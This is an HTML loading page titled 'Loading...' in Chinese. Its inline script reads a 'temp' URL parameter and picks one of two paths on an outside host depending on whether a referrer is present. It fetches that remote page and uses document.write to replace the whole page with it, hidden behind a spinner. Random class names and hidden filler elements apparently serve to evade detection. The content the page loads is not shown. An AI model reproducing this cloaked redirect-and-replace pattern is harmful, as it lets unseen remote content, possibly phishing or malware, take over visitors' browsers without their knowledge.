<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .EI2Sz05MS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .EI2Sz05MS .cujaiWdL {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .EI2Sz05MS .content {
            line-height: 50px;
            text-align: center
        }

        .EI2Sz05MS .img {
            width: 100%
        }

        .EI2Sz05MS .ADhGvRix {
            text-align: center
        }

        .EI2Sz05MS .ADhGvRix span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .EI2Sz05MS .ADhGvRix span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .EI2Sz05MS .ADhGvRix span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .EI2Sz05MS .ADhGvRix span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .EI2Sz05MS .ADhGvRix span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .EI2Sz05MS .ADhGvRix span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .EI2Sz05MS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function g3irQ0LEpBV(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var JUEdWEC = g3irQ0LEpBV('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ JUEdWEC +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ JUEdWEC +".html?a=share";
		}
		
        FgCWpJA=url+"#"+new Date().getTime();
        FgCWpJA && function() {
            $.get(FgCWpJA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<li style='display:none' >TlCeVqnjDycMQdQQnJFQGLdH4ofp</li>
<h1 style='display:none' >GIxwnGocc6F2N3SQgAp6jM9acyZXmJSenoxCJpdETnBYn5ePO9N4Phn6FNq094jTSrh8QPegkaZslYukrszgWt</h1><div class="EI2Sz05MS">
    <div class="cujaiWdL">
        <div class="ADhGvRix">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >AVzhn3z1QTKPr4NamOIADy1AJAEx5sa91exCMlRW5Wg6Zk</ul>
<b style='display:none' >z2K4B73X8sOZoPngXw3Bddkg70K7XGe1RSv5Uf7qTTKmcGRHywE8o8y2SlVtJHnCDSzBxDMUpTO</b>
<ul style='display:none' >AVzhn3z1QTKPr4NamOIADy1AJAEx5sa91exCMlRW5Wg6Zk</ul>
<div style='display:none'>z4sS9JFpDzJ4TpDjOeQvZ10xdszilWfE</div>
<img  src='' style='display:none'>
<ul style='display:none' >AVzhn3z1QTKPr4NamOIADy1AJAEx5sa91exCMlRW5Wg6Zk</ul>
<h1 style='display:none' >YjjnluQsxadydbGa83OgbgPxmXp4EZpjVhTkrpSxWN</h1>
<p  style='display:none'>cMMR9QNPLFZJJUp19BMYH41TCg9etfG85mjl1Thh5tx6pJgyt83LLr3AMNDvvUhE7</p>
<img  src='' style='display:none'>
<span style='display:none'>tdygjulOQOrfi7Od8QHzUTeuymWOC45oPM9KiuxaofcEeWHwYRVqcbW5ENQpIWNnQzhPGQNkba3FaVuzmMPQQ0ridGLXS0aa5MWu</span></body>
</html>